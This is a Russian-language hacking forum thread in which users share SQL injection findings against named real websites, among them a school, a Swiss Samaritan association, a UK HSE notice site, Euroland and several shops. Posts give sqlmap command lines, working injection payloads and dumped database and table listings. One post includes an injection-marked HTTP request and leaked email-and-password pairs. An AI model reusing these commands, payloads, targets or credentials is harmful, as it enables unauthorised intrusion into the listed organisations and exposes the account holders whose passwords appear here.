Код:
sqlmap --url="www.habibitours.com/cat.php?id=1"
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 1480=1480-
XSS.stack #1 – первый литературный журнал от юзеров форума
Найденные интересеные SQL inj & XSS
- Автор темы Xrenovi4
- Дата начала
Код:
sqlmap -url="https://www.ssc.edu.in/newsdetails.php?id=26" --dbs --random-agent --threads=10 --batch
GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Wishing all a successful academic year!")
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=26' AND 3740=3740 AND 'plmj'='plmj
Код:
sqlmap --url="https://samaritermuensingen.ch/index.php?id=2" --dbs --tables --dump-all
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: id=2' OR NOT 2520=2520#
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=2' AND (SELECT 5171 FROM(SELECT COUNT(*),CONCAT(0x7162787671,(SELECT (ELT(5171=5171,1))),0x7176767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- syPz
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 4008 FROM (SELECT(SLEEP(5)))Zydh)-- Oxdd
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: id=2' UNION ALL SELECT NULL,NULL,CONCAT(0x7162787671,0x7a68784e58775777744669517a6149516c51794e694d5652647159786944794d47625a68786e6f6f,0x7176767171),NULL,NULL,NULL,NULL,NULL,NULL#
---
[02:46:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[02:46:43] [INFO] fetching database names
[02:46:43] [INFO] resumed: 'information_schema'
[02:46:43] [INFO] resumed: 'samariter_1'
available databases [2]:
[*] information_schema
[*] samariter_1
[02:46:43] [INFO] fetching tables for databases: 'information_schema, samariter_1'
Database: information_schema
[62 tables]
+---------------------------------------+
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMN_PRIVILEGES |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_PAGES |
| INNODB_BUFFER_POOL_PAGES_BLOB |
| INNODB_BUFFER_POOL_PAGES_INDEX |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CHANGED_PAGES |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_INDEX_STATS |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_RSEG |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_STATS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESTATS |
| INNODB_TABLE_STATS |
| INNODB_TRX |
| INNODB_UNDO_LOGS |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| XTRADB_ADMIN_COMMAND |
| COLUMNS |
| ENGINES |
| EVENTS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| TABLES |
| TRIGGERS |
+---------------------------------------+
Database: samariter_1
[19 tables]
+---------------------------------------+
| module |
| anmeldungen |
| blacklist |
| fotos |
| inhalt |
| kontakt |
| kunden |
| kurse |
| kurskat |
| news |
| portal |
| samu_adr |
| samu_adr_neu |
| samu_login |
| samu_setup |
| samu_termine |
| samu_termine_20200813 |
| seiten |
| zzz_page |
+---------------------------------------+
Код:
sqlmap --url="www.cyta.com.ar/ta/article.php?id=180101"
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=180101 AND 2829=2829
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: id=180101 AND GTID_SUBSET(CONCAT(0x717a766b71,(SELECT (ELT(5455=5455,1))),0x717a6b7a71),5455)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=180101 AND (SELECT 6261 FROM (SELECT(SLEEP(5)))FnQp)
Type: UNION query
Title: MySQL UNION query (NULL) - 24 columns
Payload: id=-8814 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a766b71,0x69446143426867647a484c486e794d6349616d555777454c59416e6357474a68546a6352654b4c79,0x717a6b7a71),NULL,NULL#sqlmap -u https://www.watchoutinvestors.com/wot_politically_exposed_person.asp --data="Member_Name=&members_category=&state="
Structure:
pastebin.com
Structure:
Database: msdb[145 tables]+------------------------------------------------- - Pastebin.com
Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
pastebin.com
Платный контент. Куплено: 3.
g
Последнее редактирование:
sqlmap -u "https://resources.hse.gov.uk/notice...T=N&CO=,AND&SN=F&EO==&SF=SIC&SV=68201&SO=DNIS"
--data="PN=1&SO=ANN"
available databases [11]:
[*] model
[*] msdb
[*] public_notice_hist_x
[*] public_notice_hist_y
[*] public_notice_x
[*] public_notice_y
[*] public_prosecution_hist_x
[*] public_prosecution_hist_y
[*] public_prosecution_x
[*] public_prosecution_y
[*] tempdb
--data="PN=1&SO=ANN"
available databases [11]:
[*] model
[*] msdb
[*] public_notice_hist_x
[*] public_notice_hist_y
[*] public_notice_x
[*] public_notice_y
[*] public_prosecution_hist_x
[*] public_prosecution_hist_y
[*] public_prosecution_x
[*] public_prosecution_y
[*] tempdb
Код:
https://www.ssc.edu.in/newsdetails.php?id=26%27+and+0+/*!12345union*/+select+1,user(),3,4,5,6,7,8,9,10,11,12,13--+ki just test it
he show vuln there then i post it i dont do shit things kid
Последнее редактирование:
sqlmap -u https://luminousworldhba.com/Products.aspx?brd=1
Database: luminousdb
[104 tables]
+--------------------+
| action_data |
| activities |
| agent_bank |
| agent_nominee |
| agents |
| articles |
| balance_postings |
| bank_changes |
| banks |
| banners |
| brands |
| categories |
| client_banks |
| client_nominee |
| clients |
| configs |
| contacts |
| countries |
| customers |
| dealer_bank |
| dealer_nominee |
| dealers |
| designation_list |
| designations |
| divisions |
| event_photos |
| events |
| expensedetails |
| expenses |
| expensetypes |
| faqs |
| flashes |
| forgots |
| groupinvoices |
| incomes |
| incometypes |
| investments |
| logs_c |
| logs_c |
| match_stages |
| notices |
| offers |
| order_item_offers |
| order_items |
| orders |
| outlets |
| packages |
| participants |
| products |
| programs |
| purchase_items_d_e |
| purchase_items_d_e |
| purchase_items_d_e |
| purchase_items_e |
| purchases_d_e |
| purchases_d_e |
| purchases_d_e |
| purchases_e |
| ratings |
| rechargeas |
| rechargeds |
| recharges |
| reviews |
| sale_items |
| sales |
| scs_ag |
| scs_ag |
| sliders |
| states |
| stocks |
| stockws |
| suppliers |
| taxes_ag |
| testimonials |
| testimonials |
| thanas |
| tpredecessor |
| transferas |
| transfers_a |
| transfers_a |
| transfers_m |
| transfers_r |
| transfers_t |
| ttransaction_a |
| ttransaction_a |
| ttransaction_bk |
| ttransaction_d |
| ttransaction_gm |
| ttransaction_l |
| ttransaction_m |
| ttransaction_o |
| ttransaction_r |
| ttransaction_s |
| ttransaction_up |
| ttransaction_z2 |
| ttransaction_z2 |
| types |
| unions |
| users |
| warehouses |
| wcs_ag |
| withdraws_ag |
| withdraws_ag |
| withdraws_dl |
+--------------------+
Database: luminousdb
[104 tables]
+--------------------+
| action_data |
| activities |
| agent_bank |
| agent_nominee |
| agents |
| articles |
| balance_postings |
| bank_changes |
| banks |
| banners |
| brands |
| categories |
| client_banks |
| client_nominee |
| clients |
| configs |
| contacts |
| countries |
| customers |
| dealer_bank |
| dealer_nominee |
| dealers |
| designation_list |
| designations |
| divisions |
| event_photos |
| events |
| expensedetails |
| expenses |
| expensetypes |
| faqs |
| flashes |
| forgots |
| groupinvoices |
| incomes |
| incometypes |
| investments |
| logs_c |
| logs_c |
| match_stages |
| notices |
| offers |
| order_item_offers |
| order_items |
| orders |
| outlets |
| packages |
| participants |
| products |
| programs |
| purchase_items_d_e |
| purchase_items_d_e |
| purchase_items_d_e |
| purchase_items_e |
| purchases_d_e |
| purchases_d_e |
| purchases_d_e |
| purchases_e |
| ratings |
| rechargeas |
| rechargeds |
| recharges |
| reviews |
| sale_items |
| sales |
| scs_ag |
| scs_ag |
| sliders |
| states |
| stocks |
| stockws |
| suppliers |
| taxes_ag |
| testimonials |
| testimonials |
| thanas |
| tpredecessor |
| transferas |
| transfers_a |
| transfers_a |
| transfers_m |
| transfers_r |
| transfers_t |
| ttransaction_a |
| ttransaction_a |
| ttransaction_bk |
| ttransaction_d |
| ttransaction_gm |
| ttransaction_l |
| ttransaction_m |
| ttransaction_o |
| ttransaction_r |
| ttransaction_s |
| ttransaction_up |
| ttransaction_z2 |
| ttransaction_z2 |
| types |
| unions |
| users |
| warehouses |
| wcs_ag |
| withdraws_ag |
| withdraws_ag |
| withdraws_dl |
+--------------------+
У вас должно быть более 10 сообщений для просмотра скрытого контента.
sqlmap -u https://www.euroland.com/SiteFiles/...res.asp?GUID=7304BAEC0BD99441BEDB53A754EB6E79 --data"=find=&findbutton=Szukaj"
Parameter: find (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: find=RuXB';WAITFOR DELAY '0:0:5'--&findbutton=Szukaj
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: find=RuXB' UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(86)+CHAR(66)+CHAR(86)+CHAR(109)+CHAR(72)+CHAR(90)+CHAR(112)+CHAR(101)+CHAR(67)+CHAR(106)+CHAR(116)+CHAR(68)+CHAR(76)+CHAR(80)+CHAR(99)+CHAR(81)+CHAR(114)+CHAR(107)+CHAR(112)+CHAR(86)+CHAR(112)+CHAR(105)+CHAR(110)+CHAR(111)+CHAR(80)+CHAR(121)+CHAR(65)+CHAR(81)+CHAR(119)+CHAR(101)+CHAR(87)+CHAR(118)+CHAR(66)+CHAR(103)+CHAR(114)+CHAR(80)+CHAR(76)+CHAR(73)+CHAR(67)+CHAR(68)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL-- NphV&findbutton=Szukaj
---
back-end DBMS: Microsoft SQL Server 2017
available databases [84]:
[*] AnalystBackup
[*] AnalystEstimates
[*] AnnualReports2007
[*] ARP2018
[*] ARP2018UserLog
[*] arp4business
[*] arp4business.AIWrapper
[*] arp4business.Worker
[*] ASPSession
[*] ASPSession2
[*] ASPState20
[*] AzureSync
[*] BackgroundTasks
[*] BannerAd
[*] Browser
[*] ChartVector
[*] contactal
[*] contactal2
[*] CustomerInterface
[*] CustomerSetting
[*] Daily
[*] EmailVerificationWorker
[*] EurolandCareers
[*] EurolandShareholders
[*] Europe
[*] EuropeBeta
[*] EuropeMini
[*] EventLog
[*] FactSheet
[*] FinCalendar
[*] FinCalendar2
[*] FinDataTable
[*] HKNews
[*] HUGIN
[*] ICEX
[*] Insiders
[*] InstrumentsHistory
[*] IRMeetingRequest
[*] Language
[*] MailService
[*] master
[*] model
[*] msdb
[*] MyIRApp3Identity
[*] MyIRApp3Profiles
[*] MyIRAppProfiles
[*] News
[*] news_feeds
[*] NewsML
[*] NewsSingapour
[*] NRM
[*] OMX
[*] Opifex
[*] phplistdb
[*] PrivateNuget
[*] PromotionDB
[*] rmq
[*] RNS
[*] RSSFeedService
[*] ShareAlert
[*] ShareGame
[*] ShareGraph
[*] ShareGraph2
[*] Shareholders
[*] ShareholdersNorway
[*] ShareHoldersUK
[*] shark
[*] SMS
[*] SnapShots
[*] sqlaudit
[*] SS
[*] subscriberDB
[*] SubscriptionCentre
[*] SubscriptionCentre2
[*] Survey
[*] SwedishInsiders
[*] tempdb
[*] umb-fgb
[*] umb-total
[*] Weborders
[*] whale
[*] wordpress
[*] xbrl
[*] xbrl_conf
Parameter: find (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: find=RuXB';WAITFOR DELAY '0:0:5'--&findbutton=Szukaj
Type: UNION query
Title: Generic UNION query (NULL) - 5 columns
Payload: find=RuXB' UNION ALL SELECT NULL,CHAR(113)+CHAR(118)+CHAR(98)+CHAR(107)+CHAR(113)+CHAR(86)+CHAR(66)+CHAR(86)+CHAR(109)+CHAR(72)+CHAR(90)+CHAR(112)+CHAR(101)+CHAR(67)+CHAR(106)+CHAR(116)+CHAR(68)+CHAR(76)+CHAR(80)+CHAR(99)+CHAR(81)+CHAR(114)+CHAR(107)+CHAR(112)+CHAR(86)+CHAR(112)+CHAR(105)+CHAR(110)+CHAR(111)+CHAR(80)+CHAR(121)+CHAR(65)+CHAR(81)+CHAR(119)+CHAR(101)+CHAR(87)+CHAR(118)+CHAR(66)+CHAR(103)+CHAR(114)+CHAR(80)+CHAR(76)+CHAR(73)+CHAR(67)+CHAR(68)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL,NULL-- NphV&findbutton=Szukaj
---
back-end DBMS: Microsoft SQL Server 2017
available databases [84]:
[*] AnalystBackup
[*] AnalystEstimates
[*] AnnualReports2007
[*] ARP2018
[*] ARP2018UserLog
[*] arp4business
[*] arp4business.AIWrapper
[*] arp4business.Worker
[*] ASPSession
[*] ASPSession2
[*] ASPState20
[*] AzureSync
[*] BackgroundTasks
[*] BannerAd
[*] Browser
[*] ChartVector
[*] contactal
[*] contactal2
[*] CustomerInterface
[*] CustomerSetting
[*] Daily
[*] EmailVerificationWorker
[*] EurolandCareers
[*] EurolandShareholders
[*] Europe
[*] EuropeBeta
[*] EuropeMini
[*] EventLog
[*] FactSheet
[*] FinCalendar
[*] FinCalendar2
[*] FinDataTable
[*] HKNews
[*] HUGIN
[*] ICEX
[*] Insiders
[*] InstrumentsHistory
[*] IRMeetingRequest
[*] Language
[*] MailService
[*] master
[*] model
[*] msdb
[*] MyIRApp3Identity
[*] MyIRApp3Profiles
[*] MyIRAppProfiles
[*] News
[*] news_feeds
[*] NewsML
[*] NewsSingapour
[*] NRM
[*] OMX
[*] Opifex
[*] phplistdb
[*] PrivateNuget
[*] PromotionDB
[*] rmq
[*] RNS
[*] RSSFeedService
[*] ShareAlert
[*] ShareGame
[*] ShareGraph
[*] ShareGraph2
[*] Shareholders
[*] ShareholdersNorway
[*] ShareHoldersUK
[*] shark
[*] SMS
[*] SnapShots
[*] sqlaudit
[*] SS
[*] subscriberDB
[*] SubscriptionCentre
[*] SubscriptionCentre2
[*] Survey
[*] SwedishInsiders
[*] tempdb
[*] umb-fgb
[*] umb-total
[*] Weborders
[*] whale
[*] wordpress
[*] xbrl
[*] xbrl_conf
Thnx bro
sqlmap -u "https://door39.store/page.php?id=15" --skip-waf --threads=10 --dbs --tamper=charencode --hex --random-agent --dump
vailable databases [2]:
[*] door_new
[*] information_schema
vailable databases [2]:
[*] door_new
[*] information_schema
sqlmap.py "https://hunniez.com/rss/?category=&id=2" -p "category" --no-cast --tamper between,charencode,space2comment --technique B --level 5 --risk 3 --random-agent --batch
available databases [2]:
[*] hunniez_pfox
[*] information_schema
Database: hunniez_pfox
[426 tables]
available databases [2]:
[*] hunniez_pfox
[*] information_schema
Database: hunniez_pfox
[426 tables]
gogetsms.com
SQLI Vuln:
Payload:
Sample
Dehashed Base:
hamzamoussaoui0000@gmail.com:Hamza321@
ratulraj786@gmail.com:rhjg303429
SQLI Vuln:
Payload:
У вас должно быть более 50 реакций для просмотра скрытого контента.
POST /eng/rentnumber HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referrer: https://www.gogetsms.com/
Cookie: PHPSESSID=segk1hda39v4otik6n6lo6fl34
Content-Length: 100
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: www.gogetsms.com
Connection: Keep-alive
code=1&country=ES&dataorderid=0*&hours=4&rentnumberpay=1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referrer: https://www.gogetsms.com/
Cookie: PHPSESSID=segk1hda39v4otik6n6lo6fl34
Content-Length: 100
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Host: www.gogetsms.com
Connection: Keep-alive
code=1&country=ES&dataorderid=0*&hours=4&rentnumberpay=1
Sample
Dehashed Base:
hamzamoussaoui0000@gmail.com:Hamza321@
ratulraj786@gmail.com:rhjg303429
Последнее редактирование:
are you using a cracked version of araneida?
Последнее редактирование:
no that was before we parted off with my araneida old partner/owner
sqlmap -u 'https://shop.aionzones.com/view_items.php?category=1b5ba9cd56bc8a9a2c0ee12251fec72055d00249&' -p category level 5 risk 3 --dbs
available databases [11]:
[*] aion_bubble_title
[*] aion_classic_cms
[*] aion_classic_dbs
[*] aion_database
[*] aion_database_test
[*] aion_shop
[*] aioncms
[*] information_schema
[*] mysql
[*] performance_schema
[*] zone_network
available databases [11]:
[*] aion_bubble_title
[*] aion_classic_cms
[*] aion_classic_dbs
[*] aion_database
[*] aion_database_test
[*] aion_shop
[*] aioncms
[*] information_schema
[*] mysql
[*] performance_schema
[*] zone_network